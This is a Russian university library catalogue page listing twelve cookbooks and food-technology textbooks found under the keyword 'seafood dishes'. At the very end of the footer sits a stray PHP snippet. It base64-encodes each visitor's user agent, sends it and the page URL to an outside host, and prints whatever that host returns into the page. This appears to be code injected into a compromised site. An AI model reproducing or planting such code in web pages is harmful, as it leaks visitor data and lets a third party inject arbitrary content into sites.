Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

177 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=БЛЮДА ИЗ МОРЕПРОДУКТОВ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 12
1. 
Козлова С. Н. Кулинарная характеристика блюд [Текст] / С. Н. Козлова, Е. Ю. Фединишина, 2014. - 191 с.
Ключевые слова 
ОБРАБОТКА СЫРЬЯ КУЛИНАРНАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО СЫРЬЯ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКА -- ПОЛУФАБРИКАТЫ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ КРОЛИКА -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- БЛЮДА ЛЕЧЕБНОГО ПИТАНИЯ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА НАЦИОНАЛЬНОЙ КУХНИ -- КУХНЯ НАЦИОНАЛЬНАЯ -- ПИТАНИЕ ИНТУРИСТОВ -- БЛЮДА ЗАРУБЕЖНОЙ КУХНИ -- КУХНЯ ЗАРУБЕЖНАЯ
Держатели документа (Информация об экземплярах) 
2. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост. Л. Е. Голунова, 2001. - 688 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
3. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост.: Л. Е. Голунова, М. Т. Лабзина, 2014. - 771 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
4. 
Кулинарные рецепты [Текст] / сост. Л. И. Воробьева, 1983. - 835 с.
Ключевые слова 
БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- ЗАКУСКА ХОЛОДНАЯ -- ЗАКУСКА ОВОЩНАЯ -- ЗАКУСКА ИЗ ЯИЦ -- СОУС -- ЗАКУСКА ГОРЯЧАЯ -- БУЛЬОН -- СУП -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- МЯСО ОТВАРНОЕ -- МЯСО ТУШЕНОЕ -- МЯСО ЖАРЕНОЕ -- МЯСО РУБЛЕНОЕ -- МЯСО ЗАПЕЧЕННОЕ -- РЫБА ОТВАРНАЯ -- РЫБА ЖАРЕНАЯ -- РЫБА ТУШЕНАЯ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МОЛОЧНЫЕ -- БЛЮДА ИЗ ЯИЦ -- ОМЛЕТ -- ОВОЩИ ОТВАРНЫЕ -- ОВОЩИ ЖАРЕНЫЕ -- ОВОЩИ ЗАПЕЧЕННЫЕ -- ОВОЩИ ТУШЕНЫЕ -- ОВОЩИ ФАРШИРОВАННЫЕ -- БЛЮДА ИЗ ГРИБОВ -- КАША -- ПЛОВ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО ПРЕСНОЕ -- ТЕСТО СЛОЕНОЕ -- БЛИНЫ -- ОЛАДЬИ -- БУЛОЧКИ -- КУЛИЧИ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- КЕКС -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- КРЕМ -- ПУДИНГ -- КОНСЕРВИРОВАНИЕ ДОМАШНЕЕ -- МАРИНАД -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ
Держатели документа (Информация об экземплярах) 
5. 
Питание и общество. - Журнал, 2008г. № 9
Оглавление 
  • Полуэктова, И. Пищевые добавки / И. Полуэктова, В. Быстрицкая. - с.12-13
    Кл. слова: ДОБАВКА ПИЩЕВАЯ
  • Дейниченко, Г. Аппарат для очистки корнеклубнеплодов / Г. Дейниченко, О. Терешкин, Д. Дмитриевский. - с.14-15
    Кл. слова: АППАРАТ ОЧИСТКИ КОРНЕКЛУБНЕПЛОДОВ
  • Сизых, В. Обработка продуктов / В. Сизых. - с.20-21
    Кл. слова: ОБРАБОТКА ПРОДУКТОВ
  • Филонов, М. Победный лук / М. Филонов. - с.22
    Кл. слова: ЛУК
  • Яблоко. - с.23
    Кл. слова: ЯБЛОКО
  • Сколько стоит диета?. - с.26
    Кл. слова: ДИЕТА
  • Из глубины веков. - с.28-29
    Кл. слова: БЛЮДА ИЗ РЫБЫ, БЛЮДА ИЗ МОРЕПРОДУКТОВ
6. 
Богушева В. И. Технология приготовления пищи [Текст] / В. И. Богушева, 2015. - 375 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ШКОЛЬНИКОВ
Держатели документа (Информация об экземплярах) 
7. 
Голубев, Владимир Николаевич. Обработка рыбы и морепродуктов : учебник для начального профессионального образования / В. Н. Голубев, Т. Н. Назаренко, Е. И. Цыбулько, 2001. - 192 с.
Держатели документа (Информация об экземплярах) 
8. 
Барановский В. А. Повар [Текст] : учеб. пособие для уч-ся проф. лицеев и училищ / В. А. Барановский, Л. Г. Шатун, 2003. - 383 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- СУП -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ТЕСТО -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
9. 
Богушева В. И. Технология приготовления пищи [Текст] : учеб. для студентов сред. спец. заведений / В. И. Богушева, 2005. - 319 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ШКОЛЬНИКОВ
Держатели документа (Информация об экземплярах) 
10. 
Харченко Н. Э. Сборник рецептур блюд и кулинарных изделий [Текст] : учеб. пособие для образовательных учреждений нач. проф. образования / Н. Э. Харченко, 2005. - 495 с.
Держатели документа (Информация об экземплярах) 
11. 
Харченко Н. Э. Сборник рецептур блюд и кулинарных изделий [Текст] : учеб. пособие для образовательных учреждений нач. проф. образования / Н. Э. Харченко, 2010. - 495 с.
Держатели документа (Информация об экземплярах) 
12. 
Китайская кухня [Текст] : издания для досуга, 2003. - 120 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2906 - 25.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.41 с.14 запросов, 1.20c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;